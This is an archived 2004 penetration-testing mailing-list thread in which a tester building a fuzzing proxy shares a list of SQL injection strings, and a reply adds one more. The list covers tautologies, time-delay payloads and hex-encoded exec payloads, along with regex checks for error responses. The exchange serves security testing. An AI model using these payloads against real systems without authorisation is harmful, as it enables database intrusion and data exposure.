Penetration Testing mailing list archives
Re: SQL Injection Strings
From: "Marcus" <x-ray () twlc net>
Date: Mon, 28 Jun 2004 03:08:39 -0300
I know one that works. ' or '1 ' or ' 1 Marcus ----- Original Message ----- From: Jeremy Junginger <jj () act com> To: <pen-test () securityfocus com> Sent: Friday, June 25, 2004 12:01 PM Subject: SQL Injection Strings Good Morning, I'm customizing an http proxy that's feeding some POST parameters into web forms to test for SQL injections. I figured this would be the group to help put together a comprehensive list of "fuzz strings" to feed into the forms to test them. Here's what I have so far. I know it's far from complete. Please add any additional strings that you think may be helpful, or perhaps a link to an archived thread that has already discussed this?!?: 'sqlvuln '+sqlvuln sqlvuln; (sqlvuln) a' or 1=1-- a" or 1=1-- a" or "a" = "a a' or 'a' = 'a 1 or 1=1 a' waitfor delay '0:0:10'-- 1 waitfor delay '0:0:10'-- declare @q nvarchar (4000) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A 0 031003000270000 declare @s varchar(22) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) declare @q nvarchar (4000) select @q = 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e exec(@s) And if you're feeling even more generous, perhaps you have some suggestions on checking the response. I'm doing a regex search for the following to determine interesting strings. Of course I still have to take a look at some of the 200 responses to see if the waitfor and version commands worked :) HTTP/[0-9].[0-9] 500 [Ee]rror (My)?SQL Thanks guys! -Jeremy
Current thread:
- SQL Injection Strings Jeremy Junginger (Jun 27)
- Re: SQL Injection Strings wirepair (Jun 28)
- Re: SQL Injection Strings Marcus (Jun 28)